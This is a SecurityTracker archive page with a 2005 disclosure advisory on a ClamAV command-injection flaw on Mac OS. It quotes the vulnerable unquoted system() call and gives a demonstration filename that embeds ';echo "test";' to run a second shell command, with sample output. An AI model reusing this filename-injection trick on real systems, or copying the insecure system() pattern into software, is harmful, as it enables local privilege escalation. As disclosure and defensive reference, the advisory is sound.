SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Security)  >   Clam AntiVirus Vendors:   clamav.sourceforge.net
Clam AntiVirus on Mac OS Lets Local Users Gain Elevated Privileges
SecurityTracker Alert ID:  1014070
SecurityTracker URL:  http://securitytracker.com/id/1014070
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 28 2005
Impact:   Execution of arbitrary code via local system, User access via local system

Version(s): 0.80rc4 through 0.84rc2
Description:   A vulnerability was reported in Clam AntiVirus. A local user can gain elevated privileges on Mac OS systems.

A local user can create a file containing a virus and having a specially crafted filename that, when processed by ClamAV, will execute arbitrary operating system commands. The commands will run with the privileges of the ClamAV process.

Only systems runnign the Mac OS file system (HFS) are affected.

The flaw resides in the filecopy() function in 'shared/misc.c' and is triggered when the ClamAV user account does not have permissions to remove the infected file and file quarantine is enabled. In this case, the software will invoke a system() call with the filename as a parameter.

The vendor was notified on April 3, 2005.

Kevin Amorin and Timothy Morgan discovered this vulnerability.

The original advisory is available at:

http://www.sentinelchicken.com/advisories/clamav/

Impact:   A local user can execute arbitrary operating system commands with the privileges of the ClamAV process.
Solution:   The vendor has issued a fixed version (0.84), available at:

http://www.clamav.net/stable.php#pagestart

Vendor URL:  www.clamav.net/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  UNIX (macOS/OS X)

Message History:   None.


 Source Message Contents

Date:  Fri, 27 May 2005 22:02:49 -0400
Subject:  [VulnWatch] ClamAV: Local Privilege Escalation Vulnerability On MacOS [SCN Advisory #04]


--cWoXeonUoKmBZSoM
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

The full, up-to-date advisory will be maintained here:
  http://www.sentinelchicken.com/advisories/clamav/

For your convenience, a text version is included below.

tim



--



CLAMAV: LOCAL PRIVILEGE ESCALATION VULNERABILITY ON MACOS
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D


TABLE OF CONTENTS
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

I.   Background

II.  Overview

III. Details

IV.  Mitigating Factors

V.   Disclosure Timeline

VI.  Credits

VII. References


I. BACKGROUND
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

Taken from the Clam AntiVirus website[1]:
  "Clam AntiVirus is a GPL anti-virus toolkit for UNIX. The main
   purpose of this software is the integration with mail servers
   (attachment scanning). The package provides a flexible and scalable
   multi-threaded daemon, a command line scanner, and a tool for
   automatic updating via Internet. The programs are based on a shared
   library distributed with the Clam AntiVirus package, which you can
   use with your own software. Most importantly, the virus database is
   kept up to date."


II. OVERVIEW
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
A vulnerability was discovered in ClamAV during a code audit.  This
vulnerability could allow a local attacker on a MacOS system to elevate
privileges to that of a user running a ClamAV process.  This problem
affects ClamAV versions 0.80rc4 through 0.84rc2, and is fixed in
versions 0.84 and later.


III. DETAILS
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Under the Mac OS file system (HFS) files are saved as to parts data and
resource fork.  In ClamAV version 0.80rc4, support was added to copy
both the data and the resource fork when moving a virus infected file.
The mechanism they used was the Mac local system utility ditto.  While
there isn't a security issue with using the "ditto" command itself, the
system() call they use to execute it is insecure.  From the function
filecopy(), in the file shared/misc.c:=20

=2E..
#ifdef C_DARWIN
    /* On Mac OS X use ditto and copy resource fork, too. */
    char *ditto =3D (char *) mcalloc(strlen(src) + strlen(dest) + 30,\
                                   sizeof(char));
    sprintf(ditto, "/usr/bin/ditto --rsrc %s %s", src, dest);

    if(system(ditto)) {
        free(ditto);
        return -1;
    }
=2E..

This code does not check the filename for shell special characters, or
quote existing ones.  If a file name contains an embedded shell command
the system() will execute it as the ClamAV current UID.  An example
attack is as follows:=20

Download a test virus
  http://www.eicar.org/download/eicar.com

And rename it like so:
$ mv eicar.com \;echo\ \"test\"\;


If the clam user does not have permissions to remove the file it will
try and copy the file and the resource fork via the ditto system call.
The command it will execute in this case is:

system("/usr/bin/ditto -rsrc ;echo "test"; /tmp/;echo "test" ");

The shell will interpret the ';echo "test"; 's a separate command and
execute it.  The following is some sample output:


$ sudo -u nobody clamscan . --debug --move=3D/tmp
=2E..
LibClamAV debug: Eicar-Test-Signature found in descriptor 6.
=2E/;echo "test";: Eicar-Test-Signature FOUND
usage:  ditto [ <options> ] src [ ... src ] dst
    <options> are any of:
    -v              print a line of status for each src copied
    -V              print a line of status for every file copied
    -X              do not descend into directories with a different
                    device ID=20
    -c              create a CPIO archive at dst
    -x              unpack the CPIO archives at src...
    -z              CPIO archives are compressed
    -k              archives are PKZip format
    --keepParent    parent directory of src is embedded in dst

    --arch archVal  fat files will be thinned to specified archVal
                    multiple -arch options can be specified
                    archVal should be one of "ppc", "i386", etc
    --bom bomFile   only files present in the specified bom are copied
    --rsrc          copy preserving resource data
    --sequesterRsrc copy resources via polite directory (PKZip only)
test
=2E..

The usage statement above is produced because in this case, ditto's call
doesn't have the correct command line options.  Afterward, "test" is
printed, as expected.


IV. MITIGATING FACTORS
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
The conditions under which this can be exploited are very limited.  A
ClamAV process must be configured to move files to a quarantine in order
for the ditto call to be used.  In addition, this call only appears to
be used if a file move operation fails, at which point the file is then
copied.  Once again, due to the #define used in the affected function,
only Mac OS installations are affected.


V. DISCLOSURE TIMELINE
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
2005-03-31   Initial Discovery
2005-04-03   ClamAV Team Notified
2005-04-29   Version 0.84 Released
2005-05-27   Public Disclosure


VI. CREDITS
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Discovered by:
  Kevin Amorin
  Timothy Morgan


VII. REFERENCES
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

1. ClamAV Team. "ClamAV: Abstract".  Accessed: 2005-05-26
   http://www.clamav.net/abstract.html

2. ClamAV Team. "clamav-0.83.tar.gz".=20
   Released: 2005-02-13.  Hosted by SourceForge.net.
   http://prdownloads.sourceforge.net/clamav/clamav-0.83.tar.gz?download

--cWoXeonUoKmBZSoM
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: Digital signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFCl9FJW7H/79uOpekRAqRzAJ4jaC8CTuh0pE/6AAUGPzHNeyFZiwCghTr7
rDNCxnDKr/eIwlTQyF5Q4lo=
=vqV/
-----END PGP SIGNATURE-----

--cWoXeonUoKmBZSoM--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2017, SecurityGlobal.net LLC